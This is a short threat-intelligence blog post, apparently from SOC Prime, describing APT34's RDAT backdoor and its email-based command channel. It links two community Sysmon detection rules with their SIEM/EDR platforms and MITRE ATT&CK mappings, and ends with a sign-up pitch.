Detection Content: RDAT Backdoor

Last week, researchers published details of the attacks targeted at Middle Eastern telecommunications carried out by APT34 (aka OilRig and Helix Kitten), and updated tools in the arsenal of this group. Of course, participants in the Threat Bounty Program did not pass by and published a couple of rules for detecting RDAT Backdoor, but more on that below.

APT34 is active since at least 2014, the group conducts reconnaissance aligned with the strategic interests of the Iranian government operating primarily in the Middle East and targeting financial, government, energy, chemical, telecommunications, and other industries. In 2020, the group conducted several campaigns, hunting for government organizations in the United States and modifying for this purpose tools used in previous campaigns.

RDAT Backdoor is also not a completely new tool, APT34 already used early versions of it in 2017 and 2018. The new version of the malware has a novel email-based C2 channel used in combination with steganography to exfiltrate data. Adversaries can use it to issue the command, read the output, and send the results to the C&C server; it is also capable of downloading and uploading files via selected C&C protocol.

Detection content to spot this threat:

Oilirg’s “RDAT “Backdoor (Sysmon detection) by Ariel Millahuel – https://tdm.socprime.com/tdm/info/k6BRV4W38EJc/xcmAgHMBQAH5UgbBf-WN/?p=1

A variant of OILRIG(RDAT Backdoor) by Emir Erdogan – https://tdm.socprime.com/tdm/info/at9qZwhXJDef/VfGCgHMBPeJ4_8xcKk9B/?p=1

The rules have translations for the following platforms:

SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, Logpoint, Humio

EDR: Carbon Black, Elastic Endpoint

MITRE ATT&CK: 

Tactics: Execution, Lateral Movement, Command and Control.

Techniques: Remote File Copy (T1105), PowerShell (T1086)

Ready to try out SOC Prime TDM? Sign up for free. Or join Threat Bounty Program to craft your own content and share it with the TDM community.